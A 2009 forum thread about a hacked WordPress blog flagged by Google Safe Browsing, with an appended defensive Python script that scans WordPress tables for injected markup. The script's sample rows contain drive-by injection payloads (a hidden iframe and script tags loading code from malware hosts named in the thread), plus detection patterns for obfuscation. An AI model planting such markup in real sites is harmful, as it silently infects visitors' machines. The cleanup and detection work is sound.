Client virus, Clueless

BenignDesign

3 Jul, 2009 - 08:02 AM
Post #1

Hey, guys....

I got a call from a client this morning whose Wordpress blog now displays the big obnoxious red "Reported Attack Site" page.... the Google Safe Browsing page shows the following:

QUOTE

What is the current listing status for richlandfire.com/incidents?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 4 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-07-01, and the last time suspicious content was found on this site was on 2009-07-01.

Malicious software includes 2 exploit(s). Successful infection resulted in an average of 8 new process(es) on the target machine.

Malicious software is hosted on 2 domain(s), including usrvnu [dot] ru/, sulidev [dot] com/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including sulidev.com/.

This site was hosted on 1 network(s) including AS21840 (SAGONET).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, richlandfire.com/incidents did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.


I've never dealt with a hacked site before. Where do I start? Is the problem going to be something added to my source code? Is it going to be a comment link from elsewhere? Is it going to be an uploaded image? Is there any way to know where the problem is going to be? And once the problem is eliminated, what steps do I need to take to get this site off the Google list?

Any help would be GREATLY appreciated!!



numeric

RE: Client Virus

3 Jul, 2009 - 02:42 PM
Post #2

**Before I start, if any admins feel that this post has too much info in it (thinking of the site rules here) feel free to delete it and I'll PM my response instead**

I did a quick Google on the site name and managed to find a link for the admin (you?) detailing how you can resolve things from the Google end. View it here

As for dealing with the actual downloads, it looks like something on the page may be redirecting the viewer to another domain which is downloading the content. There are tons of known ways of achieving this and probably many more that haven't been reported yet. One of the major ones is XSS - a process whereby poor coding allows a malicious user to "plant" nasty code on a site. Anyone who subsequently views the page triggers the code to execute. It's possible that someone has found such a hole and used it along with some sort of exploit (probably browser based) to download malicious code to the viewer's machine.

I would start by looking for XSS vulnerable parts of the site - a little research on the net will yield some pretty detailed information on how it is achieved and should give you a decent understanding of where to look. If you get stuck at all, PM me and I'll send you some links.

If you're familiar with them, using VMs can provide a great way to carry out tests on a site. Copy the site from the server, set up a LAMP server to host it on a VM network and connect another VM to it with a network analyzer running. Use a filter to flag traffic flowing to the two domains listed in the message from Google and then just browse the site as per normal.

This requires time - you don't know what browser the original "infectee" was using, or what version, or even how old the exploit is, so you may have to try a few different versions of each browser (start with IE, then Firefox and move on to the others). If this is an XSS problem (it might not be, remember), removing any and all end user added content **should** (no promises) resolve it. However, you'll still be left with the risk of it happening again as you won't know how they got in the first time.

To sum it up, you'll probably need to audit all of the user added content on the site at the very least. If you have any custom code on the site that should be a priority as well. The fix is usually simple, it's finding the problem that can be the hard part.

Hopefully, that will help you out some. I don't really want to post much more info because of the site rules regarding hacking topics so PM me if you have any more questions and I'll do my best to answer them.


-N

BenignDesign

RE: Client Virus

6 Jul, 2009 - 04:53 AM
Post #3

Thanks for your reply!

What the client and I have decided to do is back up the site content, do a complete wipe and a full clean Wordpress install - I figure that will be the best way to ensure there is nothing left of the problem.

Thanks again!

no2pencil

RE: Client Virus

6 Jul, 2009 - 09:25 AM
Post #4

I'd find some way to blame the customer.

BenignDesign

RE: Client Virus

7 Jul, 2009 - 08:36 AM
Post #5

The issue has been fixed... after a clean install and some code searching, the malicious code turned out to be in the database. Passwords have been changed. Content has been removed. Threat has been eradicated. w00t!
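numeric's advice in Post #2 to audit all user-added content, and BenignDesign's finding in Post #5 that the malicious code turned out to be in the database, describe the same job: sweep every column that stores HTML (post bodies, comments, widget text in the options table) and separate real injections from legitimate embeds. What follows is an added example written for this page, not code posted by either participant. It loads constructed sample rows into an in-memory SQLite copy of three WordPress tables (same column names as wp_posts, wp_comments and wp_options) so it runs offline; the LIKE queries are the ones you would run unchanged against the real MySQL database. The two bad hosts are the ones named in the Google report quoted in Post #1; the allow-list of legitimate script hosts and the sample rows are assumptions.

```python
"""
Sweep a WordPress database copy for injected markup.

Added example for this thread, not code from any participant. Constructed
sample rows are loaded into a throwaway SQLite copy of wp_posts, wp_comments
and wp_options; a cheap SQL first pass pulls candidate rows, then Python
heuristics tell a visible YouTube embed apart from a hidden iframe or a
script pulled from one of the hosts named in the Safe Browsing report.
"""
import re
import sqlite3

# Hosts the site is expected to load script from (assumption for this example).
ALLOWED_SCRIPT_HOSTS = {"richlandfire.com", "www.google-analytics.com"}

# Payload hosts named in the Google report quoted in the thread.
KNOWN_BAD_HOSTS = {"usrvnu.ru", "sulidev.com"}

# (table, primary key, column holding user- or admin-supplied HTML)
SWEEP_COLUMNS = [
    ("wp_posts", "ID", "post_content"),
    ("wp_comments", "comment_ID", "comment_content"),
    ("wp_options", "option_id", "option_value"),
]

RE_TAG_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
RE_TAG_SCRIPT = re.compile(r"<script\b[^>]*>", re.I)
RE_SRC = re.compile(r"\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
RE_HOST = re.compile(r"^(?:https?:)?//([^/:?#]+)")
# 0/1 pixel frames, or display:none / visibility:hidden on the tag itself
RE_HIDDEN = re.compile(
    r"(display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*[:=]\s*['\"]?[01](?:px)?\b)", re.I)
# Primitives almost always present in packed drive-by loaders
RE_OBFUSCATION = re.compile(
    r"(eval\s*\(|base64_decode\s*\(|unescape\s*\(|String\.fromCharCode)", re.I)


def host_of(url):
    """Hostname of an absolute or protocol-relative URL; '' for relative paths."""
    m = RE_HOST.match(url.strip())
    return m.group(1).lower() if m else ""


def classify(content):
    """Return the reasons a fragment of stored HTML looks injected ([] = benign)."""
    reasons = []
    for tag in RE_TAG_IFRAME.findall(content):
        m = RE_SRC.search(tag)
        host = host_of(m.group(1)) if m else ""
        if host in KNOWN_BAD_HOSTS:
            reasons.append("iframe to known-bad host " + host)
        elif RE_HIDDEN.search(tag):
            reasons.append("hidden iframe to " + (host or "relative URL"))
    for tag in RE_TAG_SCRIPT.findall(content):
        m = RE_SRC.search(tag)
        if not m:
            continue  # inline script: the obfuscation check below covers it
        host = host_of(m.group(1))
        if host in KNOWN_BAD_HOSTS:
            reasons.append("script from known-bad host " + host)
        elif host and host not in ALLOWED_SCRIPT_HOSTS:
            reasons.append("script from unlisted host " + host)
    if RE_OBFUSCATION.search(content):
        reasons.append("obfuscation primitive (eval/base64_decode/unescape/fromCharCode)")
    return reasons


def sweep(conn):
    """SQL first pass (runs as-is on MySQL), Python second pass on the candidates."""
    findings = []
    for table, pk, col in SWEEP_COLUMNS:  # identifiers come from the constant above
        sql = (f"SELECT {pk}, {col} FROM {table} WHERE {col} LIKE '%<script%' "
               f"OR {col} LIKE '%<iframe%' OR {col} LIKE '%eval(%' "
               f"OR {col} LIKE '%base64_decode%'")
        for row_id, content in conn.execute(sql):
            reasons = classify(content)
            if reasons:
                findings.append((table, row_id, reasons))
    return findings


def build_sample_db():
    """Constructed rows standing in for a mysqldump restored on a scratch host."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
        CREATE TABLE wp_comments (comment_ID INTEGER PRIMARY KEY, comment_author TEXT, comment_content TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", [
        (1, "Structure fire, Main St", "<p>Engine 31 responded at 02:14.</p>"),
        (2, "Training night", "<p>Ladder drills.</p><iframe src=\"http://sulidev.com/in.cgi?3\" "
            "width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>"),
        (3, "Open house video", "<iframe src=\"http://www.youtube.com/embed/abc\" "
            "width=\"425\" height=\"350\"></iframe>"),
    ])
    conn.executemany("INSERT INTO wp_comments VALUES (?, ?, ?)", [
        (1, "guest", "Nice site! <script>document.write(unescape('%3Cscript src=%22"
            "http://usrvnu.ru/x.js%22%3E%3C/script%3E'))</script>"),
        (2, "neighbor", "Thanks for the quick response last week."),
    ])
    conn.executemany("INSERT INTO wp_options VALUES (?, ?, ?)", [
        (1, "siteurl", "http://richlandfire.com"),
        (2, "widget_text", "<p>Donate</p><script src=\"//usrvnu.ru/c.js\"></script>"),
    ])
    return conn


if __name__ == "__main__":
    for table, row_id, reasons in sweep(build_sample_db()):
        print(f"{table}#{row_id}: " + "; ".join(reasons))
```

Run this against a dump restored on a scratch machine, not against the live server. Rows it flags still need a human look (the patterns are tells, not proof), and a clean database says nothing about the theme and plugin PHP files, which need a separate diff against pristine copies. Post #2's VM approach finds the injection by its effect on a browser; this one finds it at rest, and both views need to be clean before asking Google to re-check the site.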
